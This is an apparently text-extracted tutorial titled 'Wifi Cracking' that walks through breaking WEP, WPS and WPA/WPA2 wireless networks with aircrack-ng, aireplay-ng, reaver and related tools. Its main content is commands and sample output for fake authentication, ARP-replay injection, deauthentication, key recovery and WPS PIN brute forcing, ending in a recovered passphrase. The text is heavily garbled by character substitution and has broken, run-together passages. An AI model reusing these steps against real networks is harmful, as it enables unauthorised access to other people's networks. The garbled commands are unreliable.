JLR n00b D0X Presents:Wifi CrackingNotes from the author:In the beginning of wifi communication WEP (Wired equivalent protection) was the only encryption a wireless network user had to choose from. Which at the time was great because no tools e!isted to break it. "owever less then a year after Wi#i became mainstream tools began to emerge making cracking wep encryption possible. $he first tools where command line and it could take a very long time to crack. %ow days WEP and WP& (Wireless Protected &etup) "ave become '(() crackable. WEP taking only minutes most times and WP& taking anywhere from a few seconds to a day or two. $he only standing security for *consumer+ Wifi now falls to WP,-WP,. (Wireless Protected ,ccess) "owever even that can be cracked I# you have what it takes.What the black and green?Well you see when I was a young kid the first thing I learned was "$/0. ,nd the very first website I made was black background with lime green te!t. It was hard for even me to read. &o I decided my n((b 1(2 would be written in this way as sort of payment for all the n((bs too la3y to do a simple web search.45 6E$ 4% WI$" I$74k lets move on to the 1(2Get use to it now, and life will be easier later:#irst of all your going to need to use 0I%827 9es that 4& you think is only for programmers and developers and hard core hackers. In fact it:s easier to get started using 0inu! now so later on you don:t have to worry about hassling with how things work to perform your pentest or attacks.$he up side is that many very robust tools (and some argue the ;E&$ tools) e!ist for 0inu! based operating systems. &o grab one of those *fancy hacking+ distros like ;acktrack or 5ali and get use to using it. 1on:t worry about running any e!ploits r W'f' hack>rs here. $440& %EE1E1?,ll these tools are already installed on ;acktrack - 5ali linu! but they can also be installed on other 0inu! distros,ircrack@%6 suite (http?--www.aircrack@ng.org)tcpreplay (usually included with most linu! distros)macchanger (https?--github.com-alobbs-macchanger)Aeaver - Wash (https?--code.google.com-p-reaver@wps-)Pyrit (http?--code.google.com-p-pyrit-)oclhashcatB (http?--hashcat.net-oclhashcat@plus-)cowpatty (http?--wirelessdefence.org-Contents-coWP,tty/ain.htm)crunch (http?--sourceforge.net-pro?>J$rying directed probe requests... (I?.>?>J((?''?..?>>?GG?HH @ channel? I @ :"ack/e: (I?.>?>IPing (min-avg-ma!)? '.K.Jms-LK.'GHms-'''.L'(ms Power? >>.J> (I?.>?>I>(->(? '(()$he last line is important. Ideally it should say '(() or a very high percentage. If it is low then you are too far away from the ,P or too close. If it is 3ero then in>?GG?HH @w output wlan(Where?@c I is the channel for the wireless network@@bssid ((?''?..?>>?GG?HH is the access point /,C address. $his eliminate e!traneous traffic.@w capture is file name prefi! for the file which will contain the IMs.wlan( is the interface name.While the in>?GG?HH G. '(( H.G( 'JK>(J>>K IHGWEPWEP "ack/e

;&&I1&$,$I4%PWA0ostPacketsProbes

((?''?..?>>?GG?HH((?(#?;H?KK?,C?K. G. ( 'K>JK.&tep G @ 8se aireplay@ng to do a fake authentication with the access pointIn order for an access point to accept a packet the source /,C address must already be associated. If the source /,C address you are in>?GG?HH @h ((?(#?;H?KK?,C?K. wlan(Where?L((( @ Aeauthenticate every L((( seconds. $he long period also causes keep alive packets to be sent.@o ' @ &end only one set of packets at a time. 1efault is multiple and this confuses some ,Ps.@q '( @ &end keep alive packets every '( seconds.&uccess looks like?'K?..?>.&ending ,uthentication Aequest'K?..?>.,uthentication successful'K?..?>.&ending ,ssociation Aequest'K?..?>.,ssociation successful ?@)'K?..?G.&ending keep@alive packet'K?..?H.&ending keep@alive packetQ and so on."ere is an e!ample of what a failed authentication looks like?K?.K?(.&ending ,uthentication Aequest'K?.K?(.,uthentication successful'K?.K?(.&ending ,ssociation Aequest'K?.K?(.,ssociation successful ?@)'K?.K?(.6ot a deauthentication packet7'K?.K?(H&ending ,uthentication Aequest'K?.K?(H,uthentication successful'K?.K?(H&ending ,ssociation Aequest'K?.K?'(&ending ,uthentication Aequest'K?.K?'(,uthentication successful'K?.K?'(&ending ,ssociation Aequest%otice the *6ot a deauthentication packet+ and the continuous retries above. 1o not proceed to the ne!t step until you have the fake authentication running correctly.$roubleshooting $ips

&ome access points are configured to only allow selected /,C addresses to associate and connect. If this is the case you will not be able to successfully do fake authentication unless you know one of the /,C addresses on the allowed list. If you suspect this is the problem use the following command while trying to do fake authentication. &tart another session andRAun? tcpdump @n @vvv @s( @e @i Sinterface nameT U grep @i @E +(A,?S/,C address of your cardTU,uthenticationUssoc)+9ou would then look for error messages.If at any time you wish to confirm you are properly associated is to use tcpdump and look at the packets. &tart another session andRAun? *tcpdump @n @e @s( @vvv @i wlan(+"ere is a typical tcpdump error message you are looking for? ''?(G?>G.>L(J(( >'Gus ;&&I1?((?''?..?>>?GG?HH 1,?((?(#?;H?KK?,C?K. &,?((?''?..?>>?GG?HH 1e,uthentication? Class > frame received from nonassociated station%otice that the access point (((?''?..?>>?GG?HH) is telling the source (((?(#?;H?KK?,C?K.) you are not associated. /eaning the ,P will not process or accept the in?GG?HH @h ((?(#?;H?KK?,C?K. wlan(It will start listening for ,AP requests and when it hears one aireplay@ng will immediately start to in(( to G(( data packets per second. It can as low as a '((-second and as high as a H((-second.$roubleshooting $ipsIf you receive a message similar to *6ot a deauth-disassoc packet. Is the source mac associatedD+ this means you have lost association with the ,P. ,ll your in) and successfully associate with the ,P.&tep L @ Aun aircrack@ng to obtain the WEP key$he purpose of this step is to obtain the WEP key from the IMs gathered in the previous steps.%ote? #or learning purposes you should use a LG bit WEP key on your ,P to speed up the cracking process. If this is the case then you can include +@n LG+ to limit the checking of keys to LG bits.$wo methods will be shown. It is recommended you try both for learning purposes. ;y trying both methods you will see quickly the P$W method successfully determines the WEP key compared to the #/&-5orek method. ,s a reminder the P$W method only works successfully with arp request-reply packets. &ince this tutorial covers in>?GG?HH outputV.capWhere?@b ((?''?..?>>?GG?HH selects the one access point we are interested in. $his is optional since when we originally captured the data we applied a filter to only capture data for this one ,P.outputV.cap selects all files starting with *output+ and ending in +.cap+.$o also use the #/&-5orek method start another console session and enter? aircrack@ng @5 @b ((?''?..?>>?GG?HH outputV.capWhere?@5 invokes the #/&-5orek method@b ((?''?..?>>?GG?HH selects the one access point we are interested in. $his is optional since when we originally captured the data we applied a filter to only capture data for this one ,P.outputV.cap selects all files starting with *output+ and ending in +.cap+.If you are using '.(@rc' add the option +@5+ for the #/&-5ore5 attack. ('.(@rc' defaults to P$W.)9ou can run this while generating packets. In a short time the WEP key will be calculated and presented. 9ou will need appro!imately .H(((( IMs for LG bit and 'H((((( IMs for '.K bit keys. If you are using the P$W attack then you will need about .(((( packets for LG@bit and G(((( to KH((( packets for '.K bit. $hese are very appro!imate and there are many variables as to how many IMs you actually need to crack the WEP key. When in doubt collect as many as possible first."ere is what success looks like?,ircrack@ng (.I O((?(>?(LN $ested LJGGGI keys (got ILL'( IMs) 5;depth byte(vote)((-I '.('H) #I('H) GJ('.) #J('.) #E('.) ';( H) JJ( H) ,H( >) #L( >) (>( () '(-K >G(L') EK(.J) E((.G) (L('K) >;('L) GE('H) E'('H) .1('>) KI('.) EG('.) .(-. HL(KJ) ,L(L>) 'H('J) (.('H) L;('H) E(('H) ,;('>) (E('() 'J('() .J('() >'-H JK(G>) ',(.() I;(.() G;('J) G,('L) .;('H) G1('H) HK('H) L,('H) JC('H) 5E9 #48%17 O '.?>G?HL?JK?I( N Probability? '(()%otice that in this case it took far less then the estimated .H(((( IMs to crack the key. (#or this e!ample the #/&-5ore5 attack was used.)6eneral $roubleshooting;e sure to read all the documentation on the Wiki for the various commands used in this tutorial.&ee $utorial? I am in is not being used then *ping 'I..'LK.'..'>+. $his will cause an ,AP to be broadcast via your wireless access point and in turn this will kick off the rein>?GG?HHOBN &witching mon( to channel GOBN ,ssociated with ((?''?..?>>?GG?HH (E&&I1? "ack/e)OBN $rying pin '.>GHLJ(OBN &ending E,P40 &$,A$ requestOBN Aeceived identity requestOBN &ending identity responseOBN Aeceived /' messageOBN &ending /. messageOBN Aeceived /> messageOBN &ending /G messageOBN Aeceived W&C %,C5OBN &ending W&C %,C5OBN $rying pin ((((HLJKR......GB hours later R............OBN $rying pin I.>I(IG.OBN &ending E,P40 &$,A$ requestOBN Aeceived identity requestOBN &ending identity responseOBN Aeceived /' messageOBN &ending /. messageOBN Aeceived /> messageOBN &ending /G messageOBN Aeceived /H messageOBN &ending /L messageOBN Aeceived /J messageOBN &ending W&C %,C5OBN &ending W&C %,C5OBN Pin cracked in @@@@@@OBN WP& PI%? :I.>I(IG.:OBN WP, P&5? :ub>r'>>J:OBN ,P &&I1? :"ack/e:OBN %othing done nothing to save.,s you can see reaver attempted almost all possible keys before it found the one for our wireless network."ere we see our pin is I.>I(IG.We see the WP, Passphrase is ub>r'>>J$he great thing (or bad) about reaver is that is keeps logs of every wireless network you attack. $his means that if the Passphrase changes all you need to do is re@run reaver and in a few seconds you:ll have the new P&5. &imple rightD1epending on how strong the signal is (you can determine this by using the packet in characters in length it effectively becomes impossible to crack the pre@shared key. $he only time you can crack the pre@shared key is if it is a dictionary word or relatively short in length. Conversely if you want to have an unbreakable wireless network at home use WP,-WP,. and a L> character password composed of random characters including special symbols. $he impact of having to use a brute force approach is substantial. ;ecause it is very compute intensive a computer can only test H( to >(( possible keys per second depending on the computer CP8. It can take hours if not days to crunch through a large dictionary. If you are thinking about generating your own password list to cover all the permutations and combinations of characters and special symbols check out this brute force time calculator first. 9ou will be very surprised at how much time is required. !"P#$%AN% $his means that the passphrase must be contained in the dictionary you are using to break WP,-WP,.. If it is not in the dictionary then aircrack@ng will be unable to determine the key. $here is no difference between cracking WP, or WP,. networks. $he authentication methodology is basically the same between them. &o the techniques you use are identical. It is recommended that you e!periment with your home wireless access point to get familiar with these ideas and techniques. If you do not own a particular access point please remember to get permission from the owner prior to playing with it. I would like to acknowledge and thank the ,ircrack@ng team for producing such a great robust tool. Please send me any constructive feedback positive or negative. ,dditional troubleshooting ideas and tips are especially welcome. Assum&tions#irst this solution assumes? 9ou are using drivers patched for inL GK HG/bit are :g:. &ometimes you also need to set the monitor@mode card to the same speed. auto '/; ./; ''/; HG/; etc. ;e sure that your capture card is locked to the same channel as the ,P. 9ou can do this by specifying +@c Schannel of ,PT+ when you start airodump@ng. ;e sure there are no connection managers running on your system. $his can change channels and-or change mode without your knowledge. 9ou are physically close enough to receive both access point and wireless client packets. $he wireless card strength is typically less then the ,P strength. Conversely if you are too close then the received packets can be corrupted and discarded. &o you cannot be too close. /ake sure to use the drivers specified on the wiki. 1epending on the driver some old versions do not capture all packets. Ideally connect and disconnect a wireless client normally to generate the handshake. If you use the deauth technique send the absolute minimum of packets to cause the client to reauthenticate. %ormally this is a single deauth packet. &ending an e!cessive number of deauth packets may cause the client to fail to reconnect and thus it will not generate the four@way handshake. ,s well use directed deauths not broadcast. $o confirm the client received the deauthentication packets use tcpdump or similar to look for ,C5 packets back from the client. If you did not get an ,C5 packet back then the client did not *hear+ the deauthentication packet. $ry stopping the radio on the client station then restarting it. /ake sure you are not running any other program-process that could interfere such as connection managers 5ismet etc. Aeview your captured data using the WP, Packet Capture E!plained tutorial to see if you can identify the problem. &uch as missing ,P packets missing client packets etc.8nfortunately sometimes you need to e!periment a bit to get your card to properly capture the four@way handshake. $he point is if you don:t get it the first time have patience and e!periment a bit. It can be done7 ,nother approach is to use Wireshark to review and analy3e your packet capture. $his can sometimes give you clues as to what is wrong and thus some ideas on how to correct it. $he WP, Packet Capture E!plained tutorial is a companion to this tutorial and walks you through what a *normal+ WP, connection looks like. ,s well see the #,P for detailed information on how to use Wireshark. In an ideal world you should use a wireless device dedicated to capturing the packets. $his is because some drivers such as the A$0K'KJ0 driver do not capture packets the card itself sends. ,lso always use the driver versions specified on the wiki. $his is because some older versions of the drivers such as the A$J> driver did not capture client packets. When using Wireshark the filter *eapol+ will quickly display only the E,P40 packets. ;ased on what E,P40 packets are actually in the capture determine your correction plan. #or e!ample if you are missing the client packets then try to determine why and how to collect client packets. $o dig deep into the packet analysis you must start airodump@ng without a ;&&I1 filter and specify the capture of the full packet not r n((b you might be wondering if a graphic point and click way e!ists to do all of the above. $he answer is *9E&+ and I going to e!plain it hereD %4. W"9D;ecause they are point and click interfaces to the above tools if you understand the command line ways of attacking wifi you won:t have any issues cracking using a 68I.I hope you en